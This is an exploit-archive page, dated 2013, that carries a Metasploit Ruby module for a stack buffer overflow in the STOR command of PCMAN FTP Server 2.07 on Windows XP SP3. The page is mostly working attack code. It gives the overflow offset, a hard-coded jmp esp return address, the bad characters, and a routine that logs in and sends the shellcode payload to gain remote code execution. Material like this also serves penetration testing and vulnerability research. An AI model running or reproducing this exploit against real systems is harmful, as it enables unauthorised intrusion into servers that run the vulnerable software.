PCMAN FTP Server Buffer Overflow

PCMAN FTP Server Buffer Overflow: Posted Sep 16, 2013; Authored by Rick Flores, Polunchis | Site metasploit.com; This Metasploit module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server.; tags | exploit, overflow; MD5 | 9a8d90c62167b053b9a22c797652a9c5; Download | Favorite | Comments (0)

PCMAN FTP Server Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
      'Description'    => %q{
            This module exploits a buffer overflow vulnerability
            found in the STOR command of the PCMAN FTP v2.07 Server
            when the "/../" parameters are also sent to the server.
      },
      'Author'         => [
            'Christian (Polunchis) Ramirez',  # Initial Discovery
            'Rick (nanotechz9l) Flores',    # Metasploit Module                             
          ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'     => 1000,
          'BadChars'     => "\x00\xff\x0a\x0d\x20\x40",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3', 
            { 
              'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
              'Offset' => 2002
            } 
          ],
        ],
      'DisclosureDate' => 'Jul 17 2011',
      'DefaultTarget'  => 0))
  end
  
  def check
  connect
  disconnect
  if (banner =~ /220 PCMan's FTP Server 2.0/)
    return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login
    print_status("Trying victim #{target.name}...")    
    sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
    sploit << make_nops(4)
    sploit << payload.encoded
    send_cmd( ['STOR', '/../' + sploit], false )
    handler
    disconnect
  end
end

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Red Hat 50 files
Ubuntu 43 files
Debian 26 files
HP 11 files
Jing Wang 10 files
Mandriva 9 files
Steffen Roesemann 9 files
Benjamin Kunz Mejri 9 files
Denis Andzakovic 7 files
hadji samir 7 files

File Archives

Systems

AIX (386)
Apple (1,212)
BSD (309)
Cisco (1,522)
Debian (4,648)
Fedora (1,665)
FreeBSD (1,113)
Gentoo (2,980)
HPUX (795)
iOS (63)
iPhone (102)
IRIX (219)
Juniper (66)
Linux (26,720)
Mac OS X (527)
Mandriva (2,901)
NetBSD (245)
OpenBSD (428)
RedHat (4,215)
Slackware (595)
Solaris (1,540)
SUSE (1,440)
Ubuntu (4,052)
UNIX (7,515)
UnixWare (157)
Windows (4,537)
Other

PCMAN FTP Server Buffer Overflow

PCMAN FTP Server Buffer Overflow

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PCMAN FTP Server Buffer Overflow

Share This

PCMAN FTP Server Buffer Overflow

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems